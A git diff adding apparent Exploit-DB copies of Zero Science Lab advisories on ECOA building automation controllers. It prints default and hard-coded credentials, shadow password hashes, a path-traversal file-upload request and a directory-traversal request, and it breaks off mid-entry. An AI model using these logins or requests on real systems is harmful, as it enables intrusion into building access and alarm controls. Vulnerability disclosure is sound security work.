diff --git a/exploits/hardware/local/50283.txt b/exploits/hardware/local/50283.txt
new file mode 100644
index 000000000..c95e19b73
--- /dev/null
+++ b/exploits/hardware/local/50283.txt
@@ -0,0 +1,109 @@
+# Exploit Title: ECOA Building Automation System - Missing Encryption Of Sensitive Information
+# Date: 25.06.2021
+# Exploit Author: Neurogenesia
+# Vendor Homepage: http://www.ecoa.com.tw
+
+ECOA Building Automation System Missing Encryption Of Sensitive Information
+
+
+Vendor: ECOA Technologies Corp.
+Product web page: http://www.ecoa.com.tw
+Affected version: ECOA ECS Router Controller - ECS (FLASH)
+ ECOA RiskBuster Terminator - E6L45
+ ECOA RiskBuster System - RB 3.0.0
+ ECOA RiskBuster System - TRANE 1.0
+ ECOA Graphic Control Software
+ ECOA SmartHome II - E9246
+ ECOA RiskTerminator
+
+Summary:
+#1 The Risk-Terminator Web Graphic control BEMS (Building Energy Management System) are
+designed to provide you with the latest in the Human Machine Interface (HMI) technology,
+for completely monitoring and controlling management. It may be used singly for small and
+medium sized facilities, could be linked together via the high-speed Ethernet to other
+servers that suit to World Wide Web (WWW) or Local Area Network (LAN) for large and more
+sophisticated applications. The Risk-Terminator practice Web basic conception that with
+operation simply and conveniently, totally share risk and make sure of security. Even
+remote sites may be controlled and monitored through Ethernet port, which base on standard
+transferring protocol like XML, Modbus TCP/IP or BACnet or URL.
+
+#2 The RiskBuster is a Web enabled network Router Server that uses Ethernet and TCP/IP
+networking technologies. It incorporates an embedded web server that can deliver user-specific
+web pages to any PC or mobile terminal running internet browser software. A user with an
+appropriate security codes can made adjustment or monitor the network control unit form
+any internet access point in the world. It also provides network management, integration
+and process control functions for any existing or new building controllers and microprocessor
+based equipments or system in buildings. The management function provided by the RiskBuster
+such as trend log and alarm generation improves building controllers and microprocessor
+based equipments or system management and audit trail capabilities. The integration function
+provided by the RiskBuster allows seamless integration such as information sharing (read/write)
+between building controllers and microprocessor based equipments or system without any need
+of major upgrade or equipments replacement and allow cost saving. The process control functions
+provided by the RiskBuster allow global control action to be implemented across any building
+controllers and microprocessor based equipments or system to allow full building control. The
+RiskBuster provide a truly cost effective solution for any building automation or high level
+integration application. A truly Ethernet network compliant feature allows the RiskBuster to
+be install anywhere in the building.
+
+#3 ECM0000160 Digital Logic Controller (DLC) are Pre-programmed controller it intended for
+Building Automate System; Environment control system; HVAC control system and other types of
+equipment. Being fully programmable it ensures complete application versatility, allowing
+specific products to be created according to customer requests. This controller is a configurable
+unitary controller based on the 32bit series microcomputer, with an on-board clock, have two
+RS-485 local bus.
+
+#4 The ECS0000160 is a Router Controller for building and industry products based on various
+microprocessors. It not only accessing information but also monitoring and controlling across
+Internet directly. The ECS0000160 can totally replace and improve a typical system that always
+has tedious panel and complex working process. An obviously benefit to our customers is that
+ECS0000160 enabling them to interact with their systems anytime, anywhere, not only just allowed
+to connect with singular specific operating system. It's like a whole package, which provides
+browsers an easy platform to monitor and control the doors, alarms, devices, etc. that all
+through web-pages operating, which works base on standard transmission Internet protocol. The
+ECS0000160 provides a low industry cost. A truly friendly network interface which is simple
+and easy to apply on factory floors. It supports from serial ports with options of RS485.
+
+#5 HOME SERVER-EHC9246150 - This web basic home-server is with the specifications of hidden
+installation, 32bits microcomputer and I/O Peripheral expansion circuit, which include: D/A
+conversion circuit, A/D conversion circuit and optical isolation circuit, using default proportional,
+integral and differential (P+I+D) and dead-zone control to control accurately. The controller
+features contains the sensing system, proportional control systems, computing modules, control
+modules, alarm detection system, and so on. It mainly used in building control, plant monitoring,
+air monitoring, lighting and power control, the use of premises for buildings, factories, offices,
+conference rooms, restaurants, hotels, etc.
+
+Desc:
+The BAS controller stores sensitive data (backup exports) in clear-text.
+
+Tested on: EMBED/1.0
+ Apache Tomcat/6.0.44
+ Apache Tomcat/6.0.18
+ Windows Server
+ MySQL Version 5.1.60
+ MySQL Version 4.0.16
+ Version 2.0.1.28 20180628
+
+
+Vulnerability discovered by Neurogenesia
+ @zeroscience
+
+
+Advisory ID: ZSL-2021-5676
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5676.php
+
+
+25.06.2021
+
+--
+
+
+Missing Encryption of Sensitive Information
+-------------------------------------------
+
+- Data stored on the system is not protected/encrypted.
+
+sql_[DATE]linux.dat reveals clear-text password from backup.
+
+Excerpt from DB:
+
+Insert into userlist (userid,userpwd,userClass,userfrm,duetime,modidate,userMenu,usertel,usermobil,usermail,gpname,userCname,usergrp) values (?,?,?,?,?,?,?,?,?,?,?,?,?)%%2%%1user%%3user%%312%%3%%30%%320100630133229%%3null%%3%%3%%3%%3%%3%%3%%3%%1guest%%3guest%%31%%3%%30%%320100630133229%%3null%%3%%3%%3%%3%%3%%3%%3%%1humex%%3humex4377
\ No newline at end of file
diff --git a/exploits/hardware/remote/50282.txt b/exploits/hardware/remote/50282.txt
new file mode 100644
index 000000000..05569b7d2
--- /dev/null
+++ b/exploits/hardware/remote/50282.txt
@@ -0,0 +1,114 @@
+# Exploit Title: ECOA Building Automation System - Hard-coded Credentials SSH Access
+# Date: 25.06.2021
+# Exploit Author: Neurogenesia
+# Vendor Homepage: http://www.ecoa.com.tw
+
+ECOA Building Automation System Hard-coded Credentials SSH Access
+
+
+Vendor: ECOA Technologies Corp.
+Product web page: http://www.ecoa.com.tw
+Affected version: ECOA ECS Router Controller - ECS (FLASH)
+ ECOA RiskBuster Terminator - E6L45
+ ECOA RiskBuster System - RB 3.0.0
+ ECOA RiskBuster System - TRANE 1.0
+ ECOA Graphic Control Software
+ ECOA SmartHome II - E9246
+ ECOA RiskTerminator
+
+Summary:
+#1 The Risk-Terminator Web Graphic control BEMS (Building Energy Management System) are
+designed to provide you with the latest in the Human Machine Interface (HMI) technology,
+for completely monitoring and controlling management. It may be used singly for small and
+medium sized facilities, could be linked together via the high-speed Ethernet to other
+servers that suit to World Wide Web (WWW) or Local Area Network (LAN) for large and more
+sophisticated applications. The Risk-Terminator practice Web basic conception that with
+operation simply and conveniently, totally share risk and make sure of security. Even
+remote sites may be controlled and monitored through Ethernet port, which base on standard
+transferring protocol like XML, Modbus TCP/IP or BACnet or URL.
+
+#2 The RiskBuster is a Web enabled network Router Server that uses Ethernet and TCP/IP
+networking technologies. It incorporates an embedded web server that can deliver user-specific
+web pages to any PC or mobile terminal running internet browser software. A user with an
+appropriate security codes can made adjustment or monitor the network control unit form
+any internet access point in the world. It also provides network management, integration
+and process control functions for any existing or new building controllers and microprocessor
+based equipments or system in buildings. The management function provided by the RiskBuster
+such as trend log and alarm generation improves building controllers and microprocessor
+based equipments or system management and audit trail capabilities. The integration function
+provided by the RiskBuster allows seamless integration such as information sharing (read/write)
+between building controllers and microprocessor based equipments or system without any need
+of major upgrade or equipments replacement and allow cost saving. The process control functions
+provided by the RiskBuster allow global control action to be implemented across any building
+controllers and microprocessor based equipments or system to allow full building control. The
+RiskBuster provide a truly cost effective solution for any building automation or high level
+integration application. A truly Ethernet network compliant feature allows the RiskBuster to
+be install anywhere in the building.
+
+#3 ECM0000160 Digital Logic Controller (DLC) are Pre-programmed controller it intended for
+Building Automate System; Environment control system; HVAC control system and other types of
+equipment. Being fully programmable it ensures complete application versatility, allowing
+specific products to be created according to customer requests. This controller is a configurable
+unitary controller based on the 32bit series microcomputer, with an on-board clock, have two
+RS-485 local bus.
+
+#4 The ECS0000160 is a Router Controller for building and industry products based on various
+microprocessors. It not only accessing information but also monitoring and controlling across
+Internet directly. The ECS0000160 can totally replace and improve a typical system that always
+has tedious panel and complex working process. An obviously benefit to our customers is that
+ECS0000160 enabling them to interact with their systems anytime, anywhere, not only just allowed
+to connect with singular specific operating system. It's like a whole package, which provides
+browsers an easy platform to monitor and control the doors, alarms, devices, etc. that all
+through web-pages operating, which works base on standard transmission Internet protocol. The
+ECS0000160 provides a low industry cost. A truly friendly network interface which is simple
+and easy to apply on factory floors. It supports from serial ports with options of RS485.
+
+#5 HOME SERVER-EHC9246150 - This web basic home-server is with the specifications of hidden
+installation, 32bits microcomputer and I/O Peripheral expansion circuit, which include: D/A
+conversion circuit, A/D conversion circuit and optical isolation circuit, using default proportional,
+integral and differential (P+I+D) and dead-zone control to control accurately. The controller
+features contains the sensing system, proportional control systems, computing modules, control
+modules, alarm detection system, and so on. It mainly used in building control, plant monitoring,
+air monitoring, lighting and power control, the use of premises for buildings, factories, offices,
+conference rooms, restaurants, hotels, etc.
+
+Desc:
+The BAS controller is vulnerable to hard-coded credentials within its Linux distribution image.
+These sets of credentials are never exposed to the end-user and cannot be changed through any
+normal operation of the device.
+
+Tested on: EMBED/1.0
+ Apache Tomcat/6.0.44
+ Apache Tomcat/6.0.18
+ Windows Server
+ MySQL Version 5.1.60
+ MySQL Version 4.0.16
+ Version 2.0.1.28 20180628
+
+
+Vulnerability discovered by Neurogenesia
+ @zeroscience
+
+
+Advisory ID: ZSL-2021-5675
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5675.php
+
+
+25.06.2021
+
+--
+
+
+Hard-coded Credentials / Remote SSH Access
+------------------------------------------
+
+- Exercise for the nation-state actors and actresses.
+
+
+root:$1$ILT0V4Sf$AR4nYzAFri3Cqi2BwFD/h.:16183:0:99999:7:::
+user:$1$pJefShJL$CoX8T20vn1g.ug0jZIczM.:11851:0:99999:7:::
+webs:$1$ZP8rifJj$8Nq6pvZfZleSOM1NxQAck0:::::::
+admin:$1$7BGOwUYp$dgzOcdE9eXPmxZ0PomIOR0:::::::
+ecoa:$1$Ux/uar1o$RlMzoY0I7KEMkmNzDqzFz1:-5835:0:99999:7:::
+humex:$1$1v5rveDi$bXRhL1q20wpYM5vo3aZ050:-5877:0:99999:7:::
+guest:$1$Zb9DELKT$IK8/EnLI8o0G36kjjBjWj1:6845:0:99999:7:::
\ No newline at end of file
diff --git a/exploits/hardware/webapps/50275.txt b/exploits/hardware/webapps/50275.txt
new file mode 100644
index 000000000..97979a7d3
--- /dev/null
+++ b/exploits/hardware/webapps/50275.txt
@@ -0,0 +1,117 @@
+# Exploit Title: ECOA Building Automation System - Weak Default Credentials
+# Date: 25.06.2021
+# Exploit Author: Neurogenesia
+# Vendor Homepage: http://www.ecoa.com.tw
+
+
+ECOA Building Automation System Weak Default Credentials
+
+
+Vendor: ECOA Technologies Corp.
+Product web page: http://www.ecoa.com.tw
+Affected version: ECOA ECS Router Controller - ECS (FLASH)
+ ECOA RiskBuster Terminator - E6L45
+ ECOA RiskBuster System - RB 3.0.0
+ ECOA RiskBuster System - TRANE 1.0
+ ECOA Graphic Control Software
+ ECOA SmartHome II - E9246
+ ECOA RiskTerminator
+
+Summary:
+#1 The Risk-Terminator Web Graphic control BEMS (Building Energy Management System) are
+designed to provide you with the latest in the Human Machine Interface (HMI) technology,
+for completely monitoring and controlling management. It may be used singly for small and
+medium sized facilities, could be linked together via the high-speed Ethernet to other
+servers that suit to World Wide Web (WWW) or Local Area Network (LAN) for large and more
+sophisticated applications. The Risk-Terminator practice Web basic conception that with
+operation simply and conveniently, totally share risk and make sure of security. Even
+remote sites may be controlled and monitored through Ethernet port, which base on standard
+transferring protocol like XML, Modbus TCP/IP or BACnet or URL.
+
+#2 The RiskBuster is a Web enabled network Router Server that uses Ethernet and TCP/IP
+networking technologies. It incorporates an embedded web server that can deliver user-specific
+web pages to any PC or mobile terminal running internet browser software. A user with an
+appropriate security codes can made adjustment or monitor the network control unit form
+any internet access point in the world. It also provides network management, integration
+and process control functions for any existing or new building controllers and microprocessor
+based equipments or system in buildings. The management function provided by the RiskBuster
+such as trend log and alarm generation improves building controllers and microprocessor
+based equipments or system management and audit trail capabilities. The integration function
+provided by the RiskBuster allows seamless integration such as information sharing (read/write)
+between building controllers and microprocessor based equipments or system without any need
+of major upgrade or equipments replacement and allow cost saving. The process control functions
+provided by the RiskBuster allow global control action to be implemented across any building
+controllers and microprocessor based equipments or system to allow full building control. The
+RiskBuster provide a truly cost effective solution for any building automation or high level
+integration application. A truly Ethernet network compliant feature allows the RiskBuster to
+be install anywhere in the building.
+
+#3 ECM0000160 Digital Logic Controller (DLC) are Pre-programmed controller it intended for
+Building Automate System; Environment control system; HVAC control system and other types of
+equipment. Being fully programmable it ensures complete application versatility, allowing
+specific products to be created according to customer requests. This controller is a configurable
+unitary controller based on the 32bit series microcomputer, with an on-board clock, have two
+RS-485 local bus.
+
+#4 The ECS0000160 is a Router Controller for building and industry products based on various
+microprocessors. It not only accessing information but also monitoring and controlling across
+Internet directly. The ECS0000160 can totally replace and improve a typical system that always
+has tedious panel and complex working process. An obviously benefit to our customers is that
+ECS0000160 enabling them to interact with their systems anytime, anywhere, not only just allowed
+to connect with singular specific operating system. It's like a whole package, which provides
+browsers an easy platform to monitor and control the doors, alarms, devices, etc. that all
+through web-pages operating, which works base on standard transmission Internet protocol. The
+ECS0000160 provides a low industry cost. A truly friendly network interface which is simple
+and easy to apply on factory floors. It supports from serial ports with options of RS485.
+
+#5 HOME SERVER-EHC9246150 - This web basic home-server is with the specifications of hidden
+installation, 32bits microcomputer and I/O Peripheral expansion circuit, which include: D/A
+conversion circuit, A/D conversion circuit and optical isolation circuit, using default proportional,
+integral and differential (P+I+D) and dead-zone control to control accurately. The controller
+features contains the sensing system, proportional control systems, computing modules, control
+modules, alarm detection system, and so on. It mainly used in building control, plant monitoring,
+air monitoring, lighting and power control, the use of premises for buildings, factories, offices,
+conference rooms, restaurants, hotels, etc.
+
+Desc:
+The BAS controller uses weak set of default administrative credentials that can be easily guessed
+in remote password attacks and gain full control of the system.
+
+Tested on: EMBED/1.0
+ Apache Tomcat/6.0.44
+ Apache Tomcat/6.0.18
+ Windows Server
+ MySQL Version 5.1.60
+ MySQL Version 4.0.16
+ Version 2.0.1.28 20180628
+
+
+Vulnerability discovered by Neurogenesia
+ @zeroscience
+
+
+Advisory ID: ZSL-2021-5668
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5668.php
+
+
+25.06.2021
+
+--
+
+
+Default / Weak Credentials
+--------------------------
+
+- Attacker can use default credentials and authenticate to the SmartHome, Building Automation and Access Control System.
+
+
+Credentials:
+
+guest:guest
+user:user
+admin:admin
+root:embed
+embed:power
+administrator:empty
+humex:humex4377
+ecoa:ecoa4377
\ No newline at end of file
diff --git a/exploits/hardware/webapps/50276.txt b/exploits/hardware/webapps/50276.txt
new file mode 100644
index 000000000..5eee09785
--- /dev/null
+++ b/exploits/hardware/webapps/50276.txt
@@ -0,0 +1,123 @@
+# Exploit Title: ECOA Building Automation System - Path Traversal Arbitrary File Upload
+# Date: 25.06.2021
+# Exploit Author: Neurogenesia
+# Vendor Homepage: http://www.ecoa.com.tw
+
+ECOA Building Automation System Path Traversal Arbitrary File Upload
+
+
+Vendor: ECOA Technologies Corp.
+Product web page: http://www.ecoa.com.tw
+Affected version: ECOA ECS Router Controller - ECS (FLASH)
+ ECOA RiskBuster Terminator - E6L45
+ ECOA RiskBuster System - RB 3.0.0
+ ECOA RiskBuster System - TRANE 1.0
+ ECOA Graphic Control Software
+ ECOA SmartHome II - E9246
+ ECOA RiskTerminator
+
+Summary:
+#1 The Risk-Terminator Web Graphic control BEMS (Building Energy Management System) are
+designed to provide you with the latest in the Human Machine Interface (HMI) technology,
+for completely monitoring and controlling management. It may be used singly for small and
+medium sized facilities, could be linked together via the high-speed Ethernet to other
+servers that suit to World Wide Web (WWW) or Local Area Network (LAN) for large and more
+sophisticated applications. The Risk-Terminator practice Web basic conception that with
+operation simply and conveniently, totally share risk and make sure of security. Even
+remote sites may be controlled and monitored through Ethernet port, which base on standard
+transferring protocol like XML, Modbus TCP/IP or BACnet or URL.
+
+#2 The RiskBuster is a Web enabled network Router Server that uses Ethernet and TCP/IP
+networking technologies. It incorporates an embedded web server that can deliver user-specific
+web pages to any PC or mobile terminal running internet browser software. A user with an
+appropriate security codes can made adjustment or monitor the network control unit form
+any internet access point in the world. It also provides network management, integration
+and process control functions for any existing or new building controllers and microprocessor
+based equipments or system in buildings. The management function provided by the RiskBuster
+such as trend log and alarm generation improves building controllers and microprocessor
+based equipments or system management and audit trail capabilities. The integration function
+provided by the RiskBuster allows seamless integration such as information sharing (read/write)
+between building controllers and microprocessor based equipments or system without any need
+of major upgrade or equipments replacement and allow cost saving. The process control functions
+provided by the RiskBuster allow global control action to be implemented across any building
+controllers and microprocessor based equipments or system to allow full building control. The
+RiskBuster provide a truly cost effective solution for any building automation or high level
+integration application. A truly Ethernet network compliant feature allows the RiskBuster to
+be install anywhere in the building.
+
+#3 ECM0000160 Digital Logic Controller (DLC) are Pre-programmed controller it intended for
+Building Automate System; Environment control system; HVAC control system and other types of
+equipment. Being fully programmable it ensures complete application versatility, allowing
+specific products to be created according to customer requests. This controller is a configurable
+unitary controller based on the 32bit series microcomputer, with an on-board clock, have two
+RS-485 local bus.
+
+#4 The ECS0000160 is a Router Controller for building and industry products based on various
+microprocessors. It not only accessing information but also monitoring and controlling across
+Internet directly. The ECS0000160 can totally replace and improve a typical system that always
+has tedious panel and complex working process. An obviously benefit to our customers is that
+ECS0000160 enabling them to interact with their systems anytime, anywhere, not only just allowed
+to connect with singular specific operating system. It's like a whole package, which provides
+browsers an easy platform to monitor and control the doors, alarms, devices, etc. that all
+through web-pages operating, which works base on standard transmission Internet protocol. The
+ECS0000160 provides a low industry cost. A truly friendly network interface which is simple
+and easy to apply on factory floors. It supports from serial ports with options of RS485.
+
+#5 HOME SERVER-EHC9246150 - This web basic home-server is with the specifications of hidden
+installation, 32bits microcomputer and I/O Peripheral expansion circuit, which include: D/A
+conversion circuit, A/D conversion circuit and optical isolation circuit, using default proportional,
+integral and differential (P+I+D) and dead-zone control to control accurately. The controller
+features contains the sensing system, proportional control systems, computing modules, control
+modules, alarm detection system, and so on. It mainly used in building control, plant monitoring,
+air monitoring, lighting and power control, the use of premises for buildings, factories, offices,
+conference rooms, restaurants, hotels, etc.
+
+Desc:
+The BAS controller suffers from an arbitrary file write and directory traversal vulnerability.
+Using the POST parameters 'rbt' and 'filename', attackers can set arbitrary values for location
+and content type and gain the possibility to execute arbitrary code on the affected device.
+
+Tested on: EMBED/1.0
+ Apache Tomcat/6.0.44
+ Apache Tomcat/6.0.18
+ Windows Server
+ MySQL Version 5.1.60
+ MySQL Version 4.0.16
+ Version 2.0.1.28 20180628
+
+
+Vulnerability discovered by Neurogenesia
+ @zeroscience
+
+
+Advisory ID: ZSL-2021-5669
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5669.php
+
+
+25.06.2021
+
+--
+
+
+Directory Traversal / File Path Traversal / Unrestricted File Upload
+--------------------------------------------------------------------
+
+- Abusing the 'filename' and 'rbt' POST parameter, attacker can navigate outside current directory and write files in arbitrary location.
+- There is no validation on file content, file extension and file location.
+
+
+Request:
+
+POST /ebd-bin/upload HTTP/1.1
+Host: 192.168.1.3:8080
+
+------WebKitFormBoundaryvxy2zFDs1Z69pfRB
+Content-Disposition: form-data; name="rbt"
+
+ecsfile
+------WebKitFormBoundaryvxy2zFDs1Z69pfRB
+Content-Disposition: form-data; name="filename"; filename="../../../anyfile.ext"
+Content-Type: application/octet-stream
+
+ANY_CONTENT_HERE
+------WebKitFormBoundaryvxy2zFDs1Z69pfRB--
\ No newline at end of file
diff --git a/exploits/hardware/webapps/50277.txt b/exploits/hardware/webapps/50277.txt
new file mode 100644
index 000000000..6f96b975c
--- /dev/null
+++ b/exploits/hardware/webapps/50277.txt
@@ -0,0 +1,144 @@
+# Exploit Title: ECOA Building Automation System - Directory Traversal Content Disclosure
+# Date: 25.06.2021
+# Exploit Author: Neurogenesia
+# Vendor Homepage: http://www.ecoa.com.tw
+
+ECOA Building Automation System Directory Traversal Content Disclosure
+
+
+Vendor: ECOA Technologies Corp.
+Product web page: http://www.ecoa.com.tw
+Affected version: ECOA ECS Router Controller - ECS (FLASH)
+ ECOA RiskBuster Terminator - E6L45
+ ECOA RiskBuster System - RB 3.0.0
+ ECOA RiskBuster System - TRANE 1.0
+ ECOA Graphic Control Software
+ ECOA SmartHome II - E9246
+ ECOA RiskTerminator
+
+Summary:
+#1 The Risk-Terminator Web Graphic control BEMS (Building Energy Management System) are
+designed to provide you with the latest in the Human Machine Interface (HMI) technology,
+for completely monitoring and controlling management. It may be used singly for small and
+medium sized facilities, could be linked together via the high-speed Ethernet to other
+servers that suit to World Wide Web (WWW) or Local Area Network (LAN) for large and more
+sophisticated applications. The Risk-Terminator practice Web basic conception that with
+operation simply and conveniently, totally share risk and make sure of security. Even
+remote sites may be controlled and monitored through Ethernet port, which base on standard
+transferring protocol like XML, Modbus TCP/IP or BACnet or URL.
+
+#2 The RiskBuster is a Web enabled network Router Server that uses Ethernet and TCP/IP
+networking technologies. It incorporates an embedded web server that can deliver user-specific
+web pages to any PC or mobile terminal running internet browser software. A user with an
+appropriate security codes can made adjustment or monitor the network control unit form
+any internet access point in the world. It also provides network management, integration
+and process control functions for any existing or new building controllers and microprocessor
+based equipments or system in buildings. The management function provided by the RiskBuster
+such as trend log and alarm generation improves building controllers and microprocessor
+based equipments or system management and audit trail capabilities. The integration function
+provided by the RiskBuster allows seamless integration such as information sharing (read/write)
+between building controllers and microprocessor based equipments or system without any need
+of major upgrade or equipments replacement and allow cost saving. The process control functions
+provided by the RiskBuster allow global control action to be implemented across any building
+controllers and microprocessor based equipments or system to allow full building control. The
+RiskBuster provide a truly cost effective solution for any building automation or high level
+integration application. A truly Ethernet network compliant feature allows the RiskBuster to
+be install anywhere in the building.
+
+#3 ECM0000160 Digital Logic Controller (DLC) are Pre-programmed controller it intended for
+Building Automate System; Environment control system; HVAC control system and other types of
+equipment. Being fully programmable it ensures complete application versatility, allowing
+specific products to be created according to customer requests. This controller is a configurable
+unitary controller based on the 32bit series microcomputer, with an on-board clock, have two
+RS-485 local bus.
+
+#4 The ECS0000160 is a Router Controller for building and industry products based on various
+microprocessors. It not only accessing information but also monitoring and controlling across
+Internet directly. The ECS0000160 can totally replace and improve a typical system that always
+has tedious panel and complex working process. An obviously benefit to our customers is that
+ECS0000160 enabling them to interact with their systems anytime, anywhere, not only just allowed
+to connect with singular specific operating system. It's like a whole package, which provides
+browsers an easy platform to monitor and control the doors, alarms, devices, etc. that all
+through web-pages operating, which works base on standard transmission Internet protocol. The
+ECS0000160 provides a low industry cost. A truly friendly network interface which is simple
+and easy to apply on factory floors. It supports from serial ports with options of RS485.
+
+#5 HOME SERVER-EHC9246150 - This web basic home-server is with the specifications of hidden
+installation, 32bits microcomputer and I/O Peripheral expansion circuit, which include: D/A
+conversion circuit, A/D conversion circuit and optical isolation circuit, using default proportional,
+integral and differential (P+I+D) and dead-zone control to control accurately. The controller
+features contains the sensing system, proportional control systems, computing modules, control
+modules, alarm detection system, and so on. It mainly used in building control, plant monitoring,
+air monitoring, lighting and power control, the use of premises for buildings, factories, offices,
+conference rooms, restaurants, hotels, etc.
+
+Desc:
+The BAS controller suffers from a directory traversal content disclosure vulnerability. Using the
+GET parameter 'cpath' in File Manager (fmangersub), attackers can disclose directory content on the
+affected device.
+
+Tested on: EMBED/1.0
+ Apache Tomcat/6.0.44
+ Apache Tomcat/6.0.18
+ Windows Server
+ MySQL Version 5.1.60
+ MySQL Version 4.0.16
+ Version 2.0.1.28 20180628
+
+
+Vulnerability discovered by Neurogenesia
+ @zeroscience
+
+
+Advisory ID: ZSL-2021-5670
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5670.php
+
+
+25.06.2021
+
+--
+
+
+Directory Traversal Content Disclosure
+--------------------------------------
+
+- Abysing the 'cpath' GET parameter, attackers can disclose directory contents by directory traversal attacks.
+- cpath=.
+- cpath=../../../../../../../etc
+
+
+Request:
+
+GET /fmangersub?cpath=/ HTTP/1.1
+Host: 192.168.1.3:8080
+
+bacevent.elf
+redown.elf
+system.bin
+webnewc.elf
+err.txt
+hole.elf
+modbustcp.elf
+ianplc.bin
+hitachi.el
+bacser.elf
+root.pem
+pwsd.bin
+server.lst
+symtbl.tbl
+client.pem
+gb-unicode.bin
+httpser.elf
+namelst.bin
+AI.tbl
+BI.tbl
+AV.tbl
+BV.tbl
+mstplalf
+rthost.elf
+big5-unicode.bin
+version.bin
+modbus.elf
+rbdev.bin
+rbdlc.elf
+powercrd.elf
\ No newline at end of file
diff --git a/exploits/hardware/webapps/50278.txt b/exploits/hardware/webapps/50278.txt
new file mode 100644
index 000000000..89d4eec1e
--- /dev/null
+++ b/exploits/hardware/webapps/50278.txt
@@ -0,0 +1,122 @@
+# Exploit Title: ECOA Building Automation System - 'multiple' Cross-Site Request Forgery (CSRF)
+# Date: 25.06.2021
+# Exploit Author: Neurogenesia
+# Vendor Homepage: http://www.ecoa.com.tw
+
+ECOA Building Automation System Cross-Site Request Forgery
+
+
+Vendor: ECOA Technologies Corp.
+Product web page: http://www.ecoa.com.tw
+Affected version: ECOA ECS Router Controller - ECS (FLASH)
+ ECOA RiskBuster Terminator - E6L45
+ ECOA RiskBuster System - RB 3.0.0
+ ECOA RiskBuster System - TRANE 1.0
+ ECOA Graphic Control Software
+ ECOA SmartHome II - E9246
+ ECOA RiskTerminator
+
+Summary:
+#1 The Risk-Terminator Web Graphic control BEMS (Building Energy Management System) are
+designed to provide you with the latest in the Human Machine Interface (HMI) technology,
+for completely monitoring and controlling management. It may be used singly for small and
+medium sized facilities, could be linked together via the high-speed Ethernet to other
+servers that suit to World Wide Web (WWW) or Local Area Network (LAN) for large and more
+sophisticated applications. The Risk-Terminator practice Web basic conception that with
+operation simply and conveniently, totally share risk and make sure of security. Even
+remote sites may be controlled and monitored through Ethernet port, which base on standard
+transferring protocol like XML, Modbus TCP/IP or BACnet or URL.
+
+#2 The RiskBuster is a Web enabled network Router Server that uses Ethernet and TCP/IP
+networking technologies. It incorporates an embedded web server that can deliver user-specific
+web pages to any PC or mobile terminal running internet browser software. A user with an
+appropriate security codes can made adjustment or monitor the network control unit form
+any internet access point in the world. It also provides network management, integration
+and process control functions for any existing or new building controllers and microprocessor
+based equipments or system in buildings. The management function provided by the RiskBuster
+such as trend log and alarm generation improves building controllers and microprocessor
+based equipments or system management and audit trail capabilities. The integration function
+provided by the RiskBuster allows seamless integration such as information sharing (read/write)
+between building controllers and microprocessor based equipments or system without any need
+of major upgrade or equipments replacement and allow cost saving. The process control functions
+provided by the RiskBuster allow global control action to be implemented across any building
+controllers and microprocessor based equipments or system to allow full building control. The
+RiskBuster provide a truly cost effective solution for any building automation or high level
+integration application. A truly Ethernet network compliant feature allows the RiskBuster to
+be install anywhere in the building.
+
+#3 ECM0000160 Digital Logic Controller (DLC) are Pre-programmed controller it intended for
+Building Automate System; Environment control system; HVAC control system and other types of
+equipment. Being fully programmable it ensures complete application versatility, allowing
+specific products to be created according to customer requests. This controller is a configurable
+unitary controller based on the 32bit series microcomputer, with an on-board clock, have two
+RS-485 local bus.
+
+#4 The ECS0000160 is a Router Controller for building and industry products based on various
+microprocessors. It not only accessing information but also monitoring and controlling across
+Internet directly. The ECS0000160 can totally replace and improve a typical system that always
+has tedious panel and complex working process. An obviously benefit to our customers is that
+ECS0000160 enabling them to interact with their systems anytime, anywhere, not only just allowed
+to connect with singular specific operating system. It's like a whole package, which provides
+browsers an easy platform to monitor and control the doors, alarms, devices, etc. that all
+through web-pages operating, which works base on standard transmission Internet protocol. The
+ECS0000160 provides a low industry cost. A truly friendly network interface which is simple
+and easy to apply on factory floors. It supports from serial ports with options of RS485.
+
+#5 HOME SERVER-EHC9246150 - This web basic home-server is with the specifications of hidden
+installation, 32bits microcomputer and I/O Peripheral expansion circuit, which include: D/A
+conversion circuit, A/D conversion circuit and optical isolation circuit, using default proportional,
+integral and differential (P+I+D) and dead-zone control to control accurately. The controller
+features contains the sensing system, proportional control systems, computing modules, control
+modules, alarm detection system, and so on. It mainly used in building control, plant monitoring,
+air monitoring, lighting and power control, the use of premises for buildings, factories, offices,
+conference rooms, restaurants, hotels, etc.
+
+Desc:
+The Building Automation System / SmartHome allows users to perform certain actions via HTTP requests
+without performing any validity checks to verify the requests. These actions can be exploited to
+perform any CRUD operation like user creation, alarm shutdown and account password change with
+administrative privileges if a logged-in user visits a malicious web site.
+
+Tested on: EMBED/1.0
+ Apache Tomcat/6.0.44
+ Apache Tomcat/6.0.18
+ Windows Server
+ MySQL Version 5.1.60
+ MySQL Version 4.0.16
+ Version 2.0.1.28 20180628
+
+
+Vulnerability discovered by Neurogenesia
+ @zeroscience
+
+
+Advisory ID: ZSL-2021-5671
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5671.php
+
+
+25.06.2021
+
+--
+
+
+Cross-Site Request Forgery (CSRF) - Add / Modify Users or Disarm Alarm
+----------------------------------------------------------------------
+
+- CSRF exist in entire solution for any CRUD operation.
+
+
+PoC:
+
+
+
+
+
+
\ No newline at end of file
diff --git a/exploits/hardware/webapps/50279.txt b/exploits/hardware/webapps/50279.txt
new file mode 100644
index 000000000..b9d6fc732
--- /dev/null
+++ b/exploits/hardware/webapps/50279.txt
@@ -0,0 +1,121 @@
+# Exploit Title: ECOA Building Automation System - Cookie Poisoning Authentication Bypass
+# Date: 25.06.2021
+# Exploit Author: Neurogenesia
+# Vendor Homepage: http://www.ecoa.com.tw
+
+ECOA Building Automation System Cookie Poisoning Authentication Bypass
+
+
+Vendor: ECOA Technologies Corp.
+Product web page: http://www.ecoa.com.tw
+Affected version: ECOA ECS Router Controller - ECS (FLASH)
+ ECOA RiskBuster Terminator - E6L45
+ ECOA RiskBuster System - RB 3.0.0
+ ECOA RiskBuster System - TRANE 1.0
+ ECOA Graphic Control Software
+ ECOA SmartHome II - E9246
+ ECOA RiskTerminator
+
+Summary:
+#1 The Risk-Terminator Web Graphic control BEMS (Building Energy Management System) are
